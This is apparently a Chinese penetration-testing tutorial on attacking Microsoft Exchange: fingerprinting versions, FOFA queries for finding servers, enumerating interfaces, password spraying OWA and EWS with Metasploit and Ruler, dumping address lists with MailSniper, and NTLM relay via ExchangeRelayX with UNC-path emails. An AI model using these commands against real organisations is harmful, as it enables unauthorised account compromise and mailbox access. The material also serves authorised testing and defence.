针对Exchange的攻击技巧

 Exchange版本识别 #

1. 访问OWA 登录页面

https://目标/owa

2. 右键源码,记住版本号为15.1.1713

3. 访问网站

Exchange Server 内部版本号和发行日期 | Microsoft Docs

经对比版本为2016 cu12

Fofa搜集exchange #

针对于exchange每个版本fofa也可以帮我们快速收集。该搜索规则不是从header、body、title中进行搜索。但结果就是挺准的

exchange粗略指纹

较准确
title="Outlook Web App"
body="/owa/auth/"
body="/themes/resources/segoeui-semilight.ttf"

#不太准
title="Exchange"

个版本指纹

#exchange 2010
app="Microsoft-Exchange-2010-POP3-server-version-03.1" || app="Microsoft-Exchange-Server-2010"

#exchange 2013
app="Microsoft-Exchange-2013" || app="Microsoft-Exchange-Server-2013-CU21" || app="Microsoft-Exchange-Server-2013-CU17" | |app="Microsoft-Exchange-Server-2013-CU23"||app="Microsoft-Exchange-Server-2013-CU13" || app="Microsoft-Exchange-Server-2013-CU22" || app="Microsoft-Exchange-Server-2013-CU11" || app="Microsoft-Exchange-Server-2013-CU2" ||app="Microsoft-Exchange-Server-2013-CU16" || app="Microsoft-Exchange-Server-2013-CU19" || app="Microsoft-Exchange-Server-2013-CU3" || app="Microsoft-Exchange-Server-2013-CU18" ||app="Microsoft-Exchange-Server-2013-CU5" || app="Microsoft-Exchange-Server-2013-CU20" || app="Microsoft-Exchange-Server-2013-CU12" || app="Microsoft-Exchange-Server-2013-CU15" || app="Microsoft-Exchange-Server-2013-CU10" || app="Microsoft-Exchange-Server-2013-CU9" || app="Microsoft-Exchange-Server-2013-CU6" || app="Microsoft-Exchange-Server-2013-CU7" || app="Microsoft-Exchange-Server-2013-CU1" || app="Microsoft-Exchange-Server-2013-CU14" || app="Microsoft-Exchange-Server-2013-CU8" || app="Microsoft-Exchange-Server-2013-RTM" || app="Microsoft-Exchange-Server-2013-SP1" || app="Microsoft-Exchange-2013"

#exchange 2016(会显示规则不存在)
app="Microsoft-Exchange-Server-2016-CU19" || app="Microsoft-Exchange-Server-2016-CU3" || app="Microsoft-Exchange-Server-2016-CU12" || app="Microsoft-Exchange-Server-2016-RTM" || app="Microsoft-Exchange-Server-2016-CU7" || app="Microsoft-Exchange-Server-2016-CU17" || app="Microsoft-Exchange-Server-2016-CU2" || app="Microsoft-Exchange-Server-2016-CU1" || app="Microsoft-Exchange-Server-2016-CU14" || app="Microsoft-Exchange-Server-2016-CU5" || app="Microsoft-Exchange-Server-2016-CU11" || app="Microsoft-Exchange-Server-2016-CU9" || app="Microsoft-Exchange-Server-2016-CU16" || app="Microsoft-Exchange-Server-2016-CU10" || app="Microsoft-Exchange-Server-2016-CU6" || app="Microsoft-Exchange-Server-2016-CU13" || app="Microsoft-Exchange-Server-2016-CU18" || app="Microsoft-Exchange-Server-2016-CU8" || app="Microsoft-Exchange-Server-2016-CU4" || app="Microsoft-Exchange-2016-POP3-server"

#exchange 2019
app="Microsoft-Exchange-Server-2019-CU5"||app="Microsoft-Exchange-Server-2019-CU3"||app="Microsoft-Exchange-Server-2019-Preview"||app="Microsoft-Exchange-Server-2019-CU8"||app="Microsoft-Exchange-Server-2019-CU1"||app="Microsoft-Exchange-Server-2019-CU7"||app="Microsoft-Exchange-Server-2019-CU2"||app="Microsoft-Exchange-Server-2019-CU6"||app="Microsoft-Exchange-Server-2019-RTM"||app="Microsoft-Exchange-Server-2019-CU4"

SPN定位内网Exchange服务器 #

setspn -Q IMAP/* | findstr "exchange"

编辑

msmailprobe 搜集Exchange接口 #

获取Exchange的接口和登录入口

git clone https://github.com/busterb/msmailprobe.git
cd msmailprobe/
go build msmailprobe.go
./msmailprobe identify -t exchange服务器主机名.域名

在域外时需要先添加 vim /etc/hosts

./msmailprobe identify -t mail.test.lab

识别出了易进行账号枚举的地址,以及暴露的一些口

exchange登陆口密码喷洒 #

msf对owa登陆口进行密码喷洒 #

当我们获取了获取Exchange的接口和登录入口,可以使用msf进行密码喷洒,需准备账号密码字典。在实际的密码喷洒过程中线程尽可能调到最低,宁愿慢、准、稳,也不要快、急、错

use auxiliary/scanner/http/owa_login
set USER_FILE ./user.txt
set PASS_FILE ./pass.txt
set StoP_ON_SUCCESS false
run

msf对ews进行密码喷洒 #

Exchange Web Service,是 exchange 提供的一套API编程接口,用于操作 exchange相关功能,对于ews接口我们也可以进行爆破密码喷洒。

但是此页面就算输入正确的邮箱,貌似也无法登陆

但是通过爆破此页面,我们也能获取到正确的邮箱账号密码

use auxiliary/scanner/http/owa_ews_login 
set rhosts 192.168.10.6
set user_file ./user.txt
set PASS_FILE ./pass.txt
set stop_on_success false
run

mailsniper.ps1获取exchange所有邮箱用户 #

MailSniper 是一种渗透测试工具,用于在 Microsoft Exchange 环境中通过电子邮件搜索特定术语(密码、内部情 报、网络架构信息等)。它可以用作非管理员用户来搜索自己的电子邮件,也可以由 Exchange 管理员使用来搜索域中每个用户的邮箱。

MailSniper 还包括用于密码喷洒、枚举用户和域、从 OWA 和 EWS 收集全局地址列表 (GAL) 以及检查组织中每个 Exchange 用户的邮箱权限的附加模块。

项目地址: https://github.com/dafthack/MailSniper

收集邮箱,为后续爆破准备

使用前提

  • 掌握其中一个用户邮箱的账户密码,并可以登录outlook
  • 在域用户登录之后才能执行该ps1

如我们登录了一个普通域用户,并且获取了一个邮箱账号和密码(demo demo.com)可以登录outlook

powershell -exec bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname outlook地址   -UserName 域用户名 -Password 已知的邮箱密码 -OutFile 导出结果.txt
Get-GlobalAddressList -ExchHostname mail.test.lab -UserName demo -Password demo.com
# -ExchHostname:ping -a exchange服务器ip -> 得到主机名 -> 主机名.域名(mail.test.lab)

导出了所有邮箱

使用 Ruler 对内网 Exchange 邮箱用户进行密码喷洒 #

Ruler 可用于从 Linux 、Windows 或 MacOSX 执行密码喷射,因为它是跨平台的。如上面获取到邮箱号后可以执行密码喷洒

项目:https://github.com/sensepost/ruler

ruler-win64.exe --domain test.lab -k brute --users userlist.txt --passwords pass.txt --delay 0 --threads 10 -v

参考:对Outlook Web Access进行密码喷洒攻击:获取目标机器权限 - redteam101

使用 ExchangeRelayX 对内网 Exchange 进行 Relay #

Microsoft Exchange 支持很多服务,比如ActiveSync 、EWS 、OWA 等。其中一些服务 (MAPI 、RPC 和 EWS) 默认支持 NTLM 身份验证,那么就有可能让红队人员进行 NTLM Relay Attack

ExchangeRelayX 用于展示攻击者对本地 Microsoft Exchange 服务器上的 EWS 端点执行基于 SMB 或 HTTP 的 NTLM 中继攻击以破坏受害者邮箱的能力。该工具为攻击者提供了一个看起来像 OWA 的界面,可以访问用户的邮箱和联系人

下载地址: https://github.com/quickbreach/ExchangeRelayX

#使用 exchangeRelayx.py 脚本来验证 Exchange Server 是否支持 NTLM 身份验证:
python3 exchangeRelayx.py -c -t https://192.168.10.6
# -t 参数指的是  Exchange 服务器的  IP 地址
#但是我这里脚本执行不了
  1. 验证exchange服务是否执行ntlm身份验证
  2. 支持则直接进行 Relay Attack 。exchangeRelayx.py -t https://192.168.10.6 ,会在本地开8000端口的web服务器监听,只要 Relay 成功就会在页面上显示成功的用户
  3. 发送带unc路径的邮件给exchange,只要点击就会relay